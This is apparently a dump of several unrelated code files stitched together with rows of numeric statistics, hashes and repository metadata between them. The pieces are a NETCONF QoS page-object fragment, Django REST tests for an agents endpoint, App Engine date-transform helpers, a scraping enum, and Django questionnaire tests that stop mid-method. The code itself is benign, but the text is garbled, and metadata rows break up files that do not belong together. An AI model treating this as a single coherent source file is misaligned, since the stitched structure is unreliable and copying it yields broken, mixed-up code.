'name': 'qos/queues/queue/name',
},
{
'name': 'qos/scheduler-policies/scheduler-policy/name',
'sequence': 'qos/scheduler-policies/scheduler-policy/schedulers/scheduler/sequence',
'id': 'qos/scheduler-policies/scheduler-policy/schedulers/scheduler/inputs/input/id',
'input_type': 'qos/scheduler-policies/scheduler-policy/schedulers/scheduler/inputs/input/config/input-type',
'queue_name': 'qos/scheduler-policies/scheduler-policy/schedulers/scheduler/inputs/input/config/queue',
},
],
'qos_scheduler_weight': [
{
'name': 'qos/scheduler-policies/scheduler-policy/name',
'sequence': 'qos/scheduler-policies/scheduler-policy/schedulers/scheduler/sequence',
'id': 'qos/scheduler-policies/scheduler-policy/schedulers/scheduler/inputs/input/id',
'weight': 'qos/scheduler-policies/scheduler-policy/schedulers/scheduler/inputs/input/config/weight',
}
],
'qos_scheduler_cir': [
{
'name': 'qos/scheduler-policies/scheduler-policy/name',
'sequence': 'qos/scheduler-policies/scheduler-policy/schedulers/scheduler/sequence',
'cir': 'qos/scheduler-policies/scheduler-policy/schedulers/scheduler/one-rate-two-color/config/cir',
}
],
'qos_scheduler_bc': [
{
'name': 'qos/scheduler-policies/scheduler-policy/name',
'sequence': 'qos/scheduler-policies/scheduler-policy/schedulers/scheduler/sequence',
'bc': 'qos/scheduler-policies/scheduler-policy/schedulers/scheduler/one-rate-two-color/config/bc',
}
],
'qos_scheduler_max_queue_depth_bytes': [
{
'name': 'qos/scheduler-policies/scheduler-policy/name',
'sequence': 'qos/scheduler-policies/scheduler-policy/schedulers/scheduler/sequence',
'max_queue_depth_bytes': 'qos/scheduler-policies/scheduler-policy/schedulers/scheduler/one-rate-two-color/config/max-queue-depth-bytes',
}
],
}
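# Each key of variables_paths appears to name a test case; each dict in its
# list describes one RPC of that test case, mapping a variable name to the
# OpenConfig YANG path it is read from or written to. A key with two dicts
# (e.g. 'qos_scheduler_queue') therefore spans a two-RPC test case, which is
# why the methods below look variables up by rpc_index.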
def execute_qos_queue_edit_config_test_case(self):
filter_to_use = """
<filter>
<qos xmlns="http://openconfig.net/yang/qos">
<queues>
<queue>
<name>{}</name>
</queue>
</queues>
</qos>
</filter>
"""
interface_name = self.get_variable_value_for_rpc_in_test_case(rpc_index=self.rpc_idx_in_test_case, variable='name')
self.set_filter(filter_to_use.format(interface_name))
self.execute_generic_edit_config_test_case()
def execute_qos_scheduler_edit_config_test_case(self):
filter_to_use = """
<filter>
<qos xmlns="http://openconfig.net/yang/qos">
<scheduler-policies>
<scheduler-policy>
<name>{}</name>
</scheduler-policy>
</scheduler-policies>
</qos>
</filter>
"""
interface_name = self.get_variable_value_for_rpc_in_test_case(rpc_index=self.rpc_idx_in_test_case, variable='name')
self.set_filter(filter_to_use.format(interface_name))
self.execute_generic_edit_config_test_case()
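# Usage sketch (hypothetical wiring; the real plumbing lives in
# BasePageObject, which is not shown in this excerpt):
#
#   qos = QOS(test_case)                 # hypothetical constructor signature
#   qos.rpc_idx_in_test_case = 0         # which RPC of the test case to use
#   qos.execute_qos_queue_edit_config_test_case()
#
# The 'name' variable is resolved through variables_paths, spliced into the
# NETCONF <filter> template, and the edit-config is then executed by
# execute_generic_edit_config_test_case().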
| 44.393162
| 152
| 0.544859
| 475
| 5,194
| 5.753684
| 0.134737
| 0.149287
| 0.182949
| 0.265276
| 0.822539
| 0.78412
| 0.769484
| 0.769484
| 0.750823
| 0.750823
| 0
| 0
| 0.330959
| 5,194
| 116
| 153
| 44.775862
| 0.786475
| 0
| 0
| 0.491071
| 0
| 0.053571
| 0.58221
| 0.376588
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017857
| false
| 0
| 0.008929
| 0
| 0.044643
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
34ad8e5f7b7ae4792323cd76dd16e75a633fc845
| 16,496
|
py
|
Python
|
api/tests/tests_agents_route.py
|
djeni98/central-erros-back
|
5d81e47df99685b4a470df56e62ff2c537fc3a52
|
[
"MIT"
] | null | null | null |
api/tests/tests_agents_route.py
|
djeni98/central-erros-back
|
5d81e47df99685b4a470df56e62ff2c537fc3a52
|
[
"MIT"
] | 1
|
2021-04-08T21:16:15.000Z
|
2021-04-08T21:16:15.000Z
|
api/tests/tests_agents_route.py
|
djeni98/central-erros-back
|
5d81e47df99685b4a470df56e62ff2c537fc3a52
|
[
"MIT"
] | 1
|
2020-07-14T12:52:07.000Z
|
2020-07-14T12:52:07.000Z
|
from api.tests.TestCase import TestCase, PermissionUtilities
from rest_framework import status
from rest_framework.test import APIClient
from logs.models import User, Agent
class AgentRouteCase(TestCase, PermissionUtilities):
invalid_agent = {
'name': 'name' + 'n' * 256,
'environment': 'invalid_environment'
}
simple_valid_agent = {
'name': 'A simple valid agent',
'environment': 'testing'
}
full_valid_agent = {
'name': 'A full valid agent',
'environment': 'production',
'address': '127.0.0.1'
# user declared in setUp()
}
route = '/api/agents/'
def setUp(self):
self.client = APIClient()
self.create_users_with_permissions(Agent)
self.agents_list = []
users_list = []
self.agents_list.append(Agent.objects.create(environment='testing', name='agent 0'))
for i, env in enumerate(['development', 'testing', 'production']):
user = User.objects.create(username=f'user{i+1}', email=f'user{i+1}@email.com')
agent = Agent.objects.create(environment=env, name=f'agent {i+1}', user=user)
self.agents_list.append(agent)
users_list.append(user)
self.full_valid_agent['user'] = users_list[0].id
def test_list_agents(self):
response = self.client.get(f'{self.route}')
with self.subTest('Must return Unauthorized', response=response):
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
body = response.json()
self.assertIn('detail', body)
self.assertIn('authentication', body.get('detail').lower())
self.login(permission='delete')
response = self.client.get(f'{self.route}')
with self.subTest('Must return Forbidden', response=response):
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
body = response.json()
self.assertIn('detail', body)
self.assertIn('permission', body.get('detail').lower())
self.login(permission='view')
response = self.client.get(f'{self.route}')
with self.subTest('Must return data and a success code', response=response):
agents = response.json()
for i, agent in enumerate(agents):
expected_agent = self.agents_list[i]
self.assertEqual(expected_agent.name, agent.get('name'))
self.assertEqual(expected_agent.environment, agent.get('environment'))
self.assertEqual(expected_agent.user_id, agent.get('user'))
def test_create_agent(self):
response = self.client.post(f'{self.route}', data={}, format='json')
with self.subTest('Must return Unauthorized', response=response):
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
body = response.json()
self.assertIn('detail', body)
self.assertIn('authentication', body.get('detail').lower())
self.login(permission='delete')
response = self.client.post(f'{self.route}', data={}, format='json')
with self.subTest('Must return Forbidden', response=response):
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
body = response.json()
self.assertIn('detail', body)
self.assertIn('permission', body.get('detail').lower())
self.login(permission='add')
response = self.client.post(f'{self.route}', data={}, format='json')
with self.subTest('Name and environment must be required', response=response):
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
body = response.json()
self.assertIn('name', body)
self.assertIn('environment', body)
self.assertSubstringIn('required', body.get('name'))
self.assertSubstringIn('required', body.get('environment'))
response = self.client.post(f'{self.route}', data=self.invalid_agent, format='json')
with self.subTest('Name and environment must be valid', response=response):
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
body = response.json()
self.assertIn('name', body)
self.assertIn('environment', body)
self.assertSubstringIn('Ensure', body.get('name'))
self.assertSubstringIn('valid', body.get('environment'))
data = self.simple_valid_agent
response = self.client.post(f'{self.route}', data=data, format='json')
with self.subTest('Agent must be created with only required fields', response=response):
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
agent = response.json()
self.assertEqual(data.get('name'), agent.get('name'))
self.assertEqual(data.get('environment'), agent.get('environment'))
expected_agents = len(self.agents_list) + 1
db_agents = Agent.objects.count()
self.assertEqual(expected_agents, db_agents)
data = self.full_valid_agent
response = self.client.post(f'{self.route}', data=data, format='json')
with self.subTest('Agent must be created with all fields', response=response):
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
agent = response.json()
self.assertEqual(data.get('name'), agent.get('name'))
self.assertEqual(data.get('environment'), agent.get('environment'))
self.assertEqual(data.get('user'), agent.get('user'))
self.assertEqual(data.get('address'), agent.get('address'))
expected_agents = len(self.agents_list) + 2
db_agents = Agent.objects.count()
self.assertEqual(expected_agents, db_agents)
def test_list_one_agent(self):
pk = len(self.agents_list) + 2
response = self.client.get(f'{self.route}{pk}/')
with self.subTest('Must return Unauthorized', response=response):
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
body = response.json()
self.assertIn('detail', body)
self.assertIn('authentication', body.get('detail').lower())
self.login(permission='delete')
response = self.client.get(f'{self.route}{pk}/')
with self.subTest('Must return Forbidden', response=response):
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
body = response.json()
self.assertIn('detail', body)
self.assertIn('permission', body.get('detail').lower())
self.login(permission='view')
response = self.client.get(f'{self.route}{pk}/')
with self.subTest('List must return not found', response=response):
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
self.assertIn('detail', response.json())
self.assertIn('not found', response.json().get('detail').lower())
pk = 2
response = self.client.get(f'{self.route}{pk}/')
with self.subTest('Must return the correct agent', response=response):
self.assertEqual(response.status_code, status.HTTP_200_OK)
agent = response.json()
expected_agent = self.agents_list[pk-1]
self.assertEqual(pk, agent.get('id'))
self.assertEqual(expected_agent.id, agent.get('id'))
self.assertEqual(expected_agent.name, agent.get('name'))
self.assertEqual(expected_agent.environment, agent.get('environment'))
def test_update_agent(self):
pk = len(self.agents_list) + 2
response = self.client.put(f'{self.route}{pk}/', data={}, format='json')
with self.subTest('Must return Unauthorized', response=response):
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
body = response.json()
self.assertIn('detail', body)
self.assertIn('authentication', body.get('detail').lower())
self.login(permission='delete')
response = self.client.put(f'{self.route}{pk}/', data={}, format='json')
with self.subTest('Must return Forbidden', response=response):
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
body = response.json()
self.assertIn('detail', body)
self.assertIn('permission', body.get('detail').lower())
self.login(permission='change')
response = self.client.put(f'{self.route}{pk}/', data={}, format='json')
with self.subTest('Update must return not found', response=response):
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
self.assertIn('detail', response.json())
self.assertIn('not found', response.json().get('detail').lower())
pk = 2
response = self.client.put(f'{self.route}{pk}/', data={}, format='json')
with self.subTest('Name and environment must be required', response=response):
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
body = response.json()
self.assertIn('name', body)
self.assertIn('environment', body)
self.assertSubstringIn('required', body.get('name'))
self.assertSubstringIn('required', body.get('environment'))
data = self.invalid_agent
response = self.client.put(f'{self.route}{pk}/', data=data, format='json')
with self.subTest('Name and environment must be valid', response=response):
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
body = response.json()
self.assertIn('name', body)
self.assertIn('environment', body)
self.assertSubstringIn('Ensure', body.get('name'))
self.assertSubstringIn('valid', body.get('environment'))
data = self.full_valid_agent
response = self.client.put(f'{self.route}{pk}/', data=data, format='json')
with self.subTest('Agent must be updated', response=response):
self.assertEqual(response.status_code, status.HTTP_200_OK)
agent = response.json()
expected_agent = self.agents_list[pk-1]
self.assertEqual(pk, agent.get('id'))
self.assertEqual(expected_agent.id, agent.get('id'))
self.assertEqual(data.get('name'), agent.get('name'))
self.assertEqual(data.get('environment'), agent.get('environment'))
self.assertEqual(data.get('user'), agent.get('user'))
self.assertEqual(data.get('address'), agent.get('address'))
self.assertNotEqual(expected_agent.name, agent.get('name'))
def test_partial_update_agent(self):
pk = len(self.agents_list) + 2
response = self.client.patch(f'{self.route}{pk}/', data={}, format='json')
with self.subTest('Must return Unauthorized', response=response):
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
body = response.json()
self.assertIn('detail', body)
self.assertIn('authentication', body.get('detail').lower())
self.login(permission='delete')
response = self.client.patch(f'{self.route}{pk}/', data={}, format='json')
with self.subTest('Must return Forbidden', response=response):
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
body = response.json()
self.assertIn('detail', body)
self.assertIn('permission', body.get('detail').lower())
self.login(permission='change')
response = self.client.patch(f'{self.route}{pk}/', data={}, format='json')
with self.subTest('Partial update must return not found', response=response):
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
self.assertIn('detail', response.json())
self.assertIn('not found', response.json().get('detail').lower())
pk = 2
data = {'name': self.invalid_agent.get('name')}
response = self.client.patch(f'{self.route}{pk}/', data=data, format='json')
with self.subTest('Name must be valid', response=response):
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
body = response.json()
self.assertIn('name', body)
self.assertSubstringIn('Ensure', body.get('name'))
pk = 2
data = {'environment': self.invalid_agent.get('environment')}
response = self.client.patch(f'{self.route}{pk}/', data=data, format='json')
with self.subTest('Environment must be valid', response=response):
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
body = response.json()
self.assertIn('environment', body)
self.assertSubstringIn('valid', body.get('environment'))
pk = 2
data = {'address': 'invalid_address'}
response = self.client.patch(f'{self.route}{pk}/', data=data, format='json')
with self.subTest('Address must be valid', response=response):
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
body = response.json()
self.assertIn('address', body)
self.assertSubstringIn('valid', body.get('address'))
pk = 2
data = {'user': 20}
response = self.client.patch(f'{self.route}{pk}/', data=data, format='json')
with self.subTest('User must be valid', response=response):
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
body = response.json()
self.assertIn('user', body)
self.assertSubstringIn('valid', body.get('user'))
pk = 2
data = {'address': self.full_valid_agent.get('address')}
response = self.client.patch(f'{self.route}{pk}/', data=data, format='json')
with self.subTest('Agent must be partially updated', response=response):
self.assertEqual(response.status_code, status.HTTP_200_OK)
agent = response.json()
expected_agent = self.agents_list[pk-1]
self.assertEqual(pk, agent.get('id'))
self.assertEqual(expected_agent.id, agent.get('id'))
self.assertEqual(expected_agent.name, agent.get('name'))
self.assertEqual(expected_agent.environment, agent.get('environment'))
self.assertEqual(expected_agent.user.id, agent.get('user'))
self.assertEqual(data.get('address'), agent.get('address'))
self.assertNotEqual(expected_agent.address, agent.get('address'))
def test_delete_agent(self):
pk = len(self.agents_list) + 2
response = self.client.delete(f'{self.route}{pk}/')
with self.subTest('Must return Unauthorized', response=response):
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
body = response.json()
self.assertIn('detail', body)
self.assertIn('authentication', body.get('detail').lower())
self.login(permission='add')
response = self.client.delete(f'{self.route}{pk}/')
with self.subTest('Must return Forbidden', response=response):
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
body = response.json()
self.assertIn('detail', body)
self.assertIn('permission', body.get('detail').lower())
self.login(permission='delete')
response = self.client.delete(f'{self.route}{pk}/')
with self.subTest('Delete must return not found', response=response):
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
self.assertIn('detail', response.json())
self.assertIn('not found', response.json().get('detail').lower())
pk = 2
response = self.client.delete(f'{self.route}{pk}/')
with self.subTest('Agent must be deleted', response=response):
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
total_agents = len(self.agents_list) - 1
db_agents = Agent.objects.count()
self.assertEqual(total_agents, db_agents)
self.assertRaises(Agent.DoesNotExist, Agent.objects.get, pk=pk)
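# assertSubstringIn() comes from PermissionUtilities and is not shown in this
# excerpt; a minimal sketch of what it plausibly does (an assumption, not the
# project's actual helper) is to assert that a substring occurs in at least
# one message of a list:
#
#   def assertSubstringIn(self, substring, messages):
#       self.assertTrue(any(substring in str(m) for m in messages),
#                       f'{substring!r} not found in {messages!r}')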
| 48.949555
| 96
| 0.629062
| 1,901
| 16,496
| 5.358759
| 0.066281
| 0.071856
| 0.054776
| 0.091293
| 0.876607
| 0.864435
| 0.8449
| 0.841563
| 0.835967
| 0.830176
| 0
| 0.009758
| 0.229692
| 16,496
| 336
| 97
| 49.095238
| 0.791926
| 0.001455
| 0
| 0.730769
| 0
| 0
| 0.158166
| 0
| 0
| 0
| 0
| 0
| 0.409091
| 1
| 0.024476
| false
| 0
| 0.013986
| 0
| 0.055944
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
34c16471451a4d334c70381e81d160e361e566dc
| 1,353
|
py
|
Python
|
djangae/db/backends/appengine/transforms.py
|
martinogden/djangae
|
22610a636556c98a68200ebbeb6f1f57da42d617
|
[
"BSD-3-Clause"
] | null | null | null |
djangae/db/backends/appengine/transforms.py
|
martinogden/djangae
|
22610a636556c98a68200ebbeb6f1f57da42d617
|
[
"BSD-3-Clause"
] | null | null | null |
djangae/db/backends/appengine/transforms.py
|
martinogden/djangae
|
22610a636556c98a68200ebbeb6f1f57da42d617
|
[
"BSD-3-Clause"
] | null | null | null |
import calendar
from datetime import date, datetime
def date_to_epoch(d):
return int(calendar.timegm(d.timetuple()) * 1000000)
def year_transform(connection, value):
value = connection.ops.value_from_db_date(value)
return date_to_epoch(date(value.year, 1, 1)) if value else None
def month_transform(connection, value):
value = connection.ops.value_from_db_date(value)
return date_to_epoch(date(value.year, value.month, 1)) if value else None
def day_transform(connection, value):
value = connection.ops.value_from_db_date(value)
return date_to_epoch(value) if value else None
def hour_transform(connection, value):
value = connection.ops.value_from_db_datetime(value)
return date_to_epoch(
datetime(
value.year, value.month, value.day,
value.hour, 1, 1
)
)
def minute_transform(connection, value):
value = connection.ops.value_from_db_datetime(value)
return date_to_epoch(
datetime(
value.year, value.month, value.day,
value.hour, value.minute, 1
)
)
def second_transform(connection, value):
value = connection.ops.value_from_db_datetime(value)
return date_to_epoch(
datetime(
value.year, value.month, value.day,
value.hour, value.minute, value.second
)
)
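# Quick sanity check (a sketch; _Conn stands in for a Django connection whose
# ops pass date values through unchanged):
if __name__ == '__main__':
    class _Ops:
        value_from_db_date = staticmethod(lambda v: v)
    class _Conn:
        ops = _Ops()
    # 2020-06-15 truncated to the start of its year, as epoch microseconds:
    print(year_transform(_Conn(), date(2020, 6, 15)))  # 1577836800000000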
| 26.529412
| 77
| 0.684405
| 181
| 1,353
| 4.906077
| 0.160221
| 0.047297
| 0.086712
| 0.195946
| 0.813063
| 0.792793
| 0.75
| 0.75
| 0.75
| 0.75
| 0
| 0.012357
| 0.222469
| 1,353
| 51
| 78
| 26.529412
| 0.831749
| 0
| 0
| 0.405405
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.189189
| false
| 0
| 0.054054
| 0.027027
| 0.432432
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
550429fc8f8efa5c29aceb88787678ba9f1d8310
| 170
|
py
|
Python
|
setup_helpers/SiteToScrape.py
|
alyshakt/fountain-properties
|
fe22ebd8fbed703d647db06df5af4810d0047eab
|
[
"CC0-1.0"
] | null | null | null |
setup_helpers/SiteToScrape.py
|
alyshakt/fountain-properties
|
fe22ebd8fbed703d647db06df5af4810d0047eab
|
[
"CC0-1.0"
] | null | null | null |
setup_helpers/SiteToScrape.py
|
alyshakt/fountain-properties
|
fe22ebd8fbed703d647db06df5af4810d0047eab
|
[
"CC0-1.0"
] | null | null | null |
"""Search Engine enums o standardize the search engine input"""
import enum
class SiteToScrape(enum.Enum):
"""To standardize the search engine input"""
landwatch = 1
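# Usage sketch: enum members can be looked up by name or by value, which is
# what makes them handy for standardizing free-form input:
#
#   SiteToScrape['landwatch']   # -> SiteToScrape.landwatch
#   SiteToScrape(1)             # -> SiteToScrape.landwatch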
| 21.25
| 63
| 0.747059
| 23
| 170
| 5.521739
| 0.608696
| 0.283465
| 0.314961
| 0.409449
| 0.488189
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006944
| 0.152941
| 170
| 7
| 64
| 24.285714
| 0.875
| 0.564706
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5511c754366264db6fd907f32c3aebc322536e17
| 15,217
|
py
|
Python
|
survey/tests/test_questionnaire.py
|
ONSdigital/alpha-eq-author
|
fe9f95695e88e9840d5cbf9e530286210adf0469
|
[
"MIT"
] | 1
|
2016-02-03T12:31:01.000Z
|
2016-02-03T12:31:01.000Z
|
survey/tests/test_questionnaire.py
|
ONSdigital/alpha-eq-author
|
fe9f95695e88e9840d5cbf9e530286210adf0469
|
[
"MIT"
] | null | null | null |
survey/tests/test_questionnaire.py
|
ONSdigital/alpha-eq-author
|
fe9f95695e88e9840d5cbf9e530286210adf0469
|
[
"MIT"
] | 1
|
2021-04-11T08:23:45.000Z
|
2021-04-11T08:23:45.000Z
|
import json
from django.core.urlresolvers import reverse
from django.test import TestCase
from survey.models import Survey, Questionnaire
from . import create_surveys, create_questionnaires, login
class QuestionnaireTestCase(TestCase):
@classmethod
def setUpTestData(cls):
cls.client = login(user="questionnaire-user", email="questionnaire-user@example.com", password="password")
with open('survey/tests/resources/survey.json') as f:
    cls.contents = f.read()
def setUp(self):
create_surveys()
create_questionnaires()
def test_questionnaire(self):
questionnaire1 = Questionnaire.objects.get(questionnaire_id='1')
questionnaire2 = Questionnaire.objects.get(questionnaire_id='2')
self.assertEqual("Test Questionnaire 1", questionnaire1.title)
self.assertEqual("Test Questionnaire 2", questionnaire2.title)
self.assertEqual("questionnaire overview 1", questionnaire1.overview)
self.assertEqual("questionnaire overview 2", questionnaire2.overview)
self.assertEqual(Survey.objects.get(survey_id='1'), questionnaire1.survey)
self.assertEqual(Survey.objects.get(survey_id='2'), questionnaire2.survey)
self.assertFalse(questionnaire1.reviewed)
self.assertFalse(questionnaire2.reviewed)
def test_check_question_count(self):
response = QuestionnaireTestCase.client.get(reverse('survey:index'))
# check that survey one has a single questionnaire with id 1
survey = response.context['object_list'][0]
self.assertEqual(Survey.objects.get(survey_id='1'), survey)
questionnaire_set = survey.questionnaire_set.all()
self.assertEqual(len(questionnaire_set), 1)
self.assertEqual(Questionnaire.objects.get(questionnaire_id='1'), questionnaire_set[0])
# check that survey two has a single questionnaire with id 2
survey = response.context['object_list'][1]
self.assertEqual(Survey.objects.get(survey_id='2'), survey)
questionnaire_set = survey.questionnaire_set.all()
self.assertEqual(len(questionnaire_set), 1)
self.assertEqual(Questionnaire.objects.get(questionnaire_id='2'), questionnaire_set[0])
def test_add_questionnaire(self):
# add a new questionnaire to survey 1
response = QuestionnaireTestCase.client.post(reverse("survey:create-questionnaire", kwargs={'survey_slug': '1'}), {'title' : 'Test Questionnaire 3', 'questionnaire_id': '3', 'overview': 'questionnaire overview 3'}, follow=True)
self.assertEqual(200, response.status_code)
# now check that survey 1 has two questionnaires
response = QuestionnaireTestCase.client.get(reverse('survey:index'))
survey = response.context['object_list'][0]
self.assertEqual(Survey.objects.get(survey_id='1'), survey)
questionnaire_set = survey.questionnaire_set.all()
self.assertEqual(len(questionnaire_set), 2)
self.assertEqual(Questionnaire.objects.get(questionnaire_id='3'), questionnaire_set[0])
self.assertEqual(Questionnaire.objects.get(questionnaire_id='1'), questionnaire_set[1])
def test_add_questionnaire_fails_when_overview_is_missing(self):
# attempt to add an invalid questionnaire (i.e. missing the overview field)
response = QuestionnaireTestCase.client.post(reverse("survey:create-questionnaire", kwargs={'survey_slug': '1'}), {'title': 'Test Questionnaire 4', 'questionnaire_id': '4'}, follow=True)
self.assertContains(response, "This field is required")
def test_add_questionnaire_fails_when_title_is_missing(self):
# attempt to add an invalid questionnaire (i.e. missing the title field)
response = QuestionnaireTestCase.client.post(reverse("survey:create-questionnaire", kwargs={'survey_slug': '1'}), {'questionnaire_id': '4', 'overview': 'questionnaire overview 4'}, follow=True)
self.assertContains(response, "This field is required")
def test_add_questionnaire_fails_when_id_is_missing(self):
# attempt to add an invalid questionnaire (i.e. missing the questionnaire_id field)
response = QuestionnaireTestCase.client.post(reverse("survey:create-questionnaire", kwargs={'survey_slug': '1'}), {'title': 'Test Questionnaire 4', 'overview': 'questionnaire overview 4'}, follow=True)
self.assertContains(response, "This field is required")
def test_reviewed(self):
# add a new questionnaire to survey 1
response = QuestionnaireTestCase.client.post(reverse("survey:create-questionnaire", kwargs={'survey_slug': '1'}), {'title' : 'Test Questionnaire 3', 'questionnaire_id': '3', 'overview': 'questionnaire overview 3'}, follow=True)
self.assertEqual(200, response.status_code)
# now check that survey 1 has two questionnaires and the reviewed state is correct
response = QuestionnaireTestCase.client.get(reverse('survey:index'))
survey = response.context['object_list'][0]
self.assertEqual(Survey.objects.get(survey_id='1'), survey)
questionnaire_set = survey.questionnaire_set.all()
self.assertEqual(len(questionnaire_set), 2)
self.assertEqual(Questionnaire.objects.get(questionnaire_id='3'), questionnaire_set[0])
self.assertEqual(Questionnaire.objects.get(questionnaire_id='1'), questionnaire_set[1])
self.assertFalse(questionnaire_set[0].reviewed)
self.assertFalse(questionnaire_set[1].reviewed)
questionnaire = Questionnaire.objects.get(questionnaire_id=1)
response = QuestionnaireTestCase.client.get(reverse("survey:review-questionnaire", kwargs={'slug': questionnaire.id}), follow=True, HTTP_REFERER=reverse('survey:index'))
questionnaire = Questionnaire.objects.get(questionnaire_id='1')
self.assertTrue(questionnaire.reviewed)
def test_reviewed_false_after_add_question(self):
# add a new questionnaire to survey 1
response = QuestionnaireTestCase.client.post(reverse("survey:create-questionnaire", kwargs={'survey_slug': '1'}), {'title' : 'Test Questionnaire 3', 'questionnaire_id': '3', 'overview': 'questionnaire overview 3'}, follow=True)
self.assertEqual(200, response.status_code)
questionnaire = Questionnaire.objects.get(questionnaire_id=3)
response = QuestionnaireTestCase.client.get(reverse("survey:review-questionnaire", kwargs={'slug': questionnaire.id}), follow=True, HTTP_REFERER=reverse('survey:index'))
questionnaire = Questionnaire.objects.get(questionnaire_id='3')
self.assertTrue(questionnaire.reviewed)
# check the reviewed status is true
response = QuestionnaireTestCase.client.get(reverse('survey:index'))
survey = response.context['object_list'][0]
self.assertEqual(Survey.objects.get(survey_id='1'), survey)
questionnaire_set = survey.questionnaire_set.all()
self.assertTrue(questionnaire_set[0].reviewed)
# now add a question
response = QuestionnaireTestCase.client.post(reverse("survey:questionnaire-builder", kwargs={'pk': questionnaire.id}), QuestionnaireTestCase.contents, content_type='Application/JSON', follow=True, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, response.status_code)
self.assertContains(response,"Your questionnaire has been saved")
# and check the reviewed status is false
response = QuestionnaireTestCase.client.get(reverse('survey:index'))
survey = response.context['object_list'][0]
self.assertEqual(Survey.objects.get(survey_id='1'), survey)
questionnaire_set = survey.questionnaire_set.all()
self.assertFalse(questionnaire_set[0].reviewed)
def test_published_a_questionnaire(self):
# add a new questionnaire to survey 1
response = QuestionnaireTestCase.client.post(reverse("survey:create-questionnaire", kwargs={'survey_slug': '1'}), {'title' : 'Test Questionnaire 3', 'questionnaire_id': '3', 'overview': 'questionnaire overview 3'}, follow=True)
self.assertEqual(200, response.status_code)
questionnaire = Questionnaire.objects.get(questionnaire_id=3)
# add a question to questionnaire
response = QuestionnaireTestCase.client.post(reverse("survey:questionnaire-builder", kwargs={'pk': questionnaire.id}), QuestionnaireTestCase.contents, content_type='Application/JSON', follow=True, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, response.status_code)
self.assertContains(response,"Your questionnaire has been saved")
response = QuestionnaireTestCase.client.get(reverse("survey:questionnaire-summary", kwargs={'slug': questionnaire.id}),follow=True)
# check we cannot make it live
self.assertNotContains(response, 'publish')
response = QuestionnaireTestCase.client.get(reverse("survey:review-questionnaire", kwargs={'slug': questionnaire.id}), follow=True, HTTP_REFERER=reverse('survey:index'))
questionnaire = Questionnaire.objects.get(questionnaire_id='3')
self.assertTrue(questionnaire.reviewed)
# check we can publish
self.assertContains(response, 'publish')
response = QuestionnaireTestCase.client.get(reverse("survey:publish-questionnaire", kwargs={'slug' :questionnaire.id}), follow=True, HTTP_REFERER=reverse('survey:index'))
questionnaire = Questionnaire.objects.get(questionnaire_id='3')
self.assertTrue(questionnaire.published)
def test_locked_questionnaire(self):
# add a new questionnaire to survey 1
response = QuestionnaireTestCase.client.post(reverse("survey:create-questionnaire", kwargs={'survey_slug': '1'}), {'title' : 'Test Questionnaire 3', 'questionnaire_id': '3', 'overview': 'questionnaire overview 3'}, follow=True)
self.assertEqual(200, response.status_code)
questionnaire = Questionnaire.objects.get(questionnaire_id=3)
# lock the questionnaire
response = QuestionnaireTestCase.client.get(reverse("survey:questionnaire-builder", kwargs={'pk': questionnaire.id}), follow=True, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, response.status_code)
# add a question to questionnaire
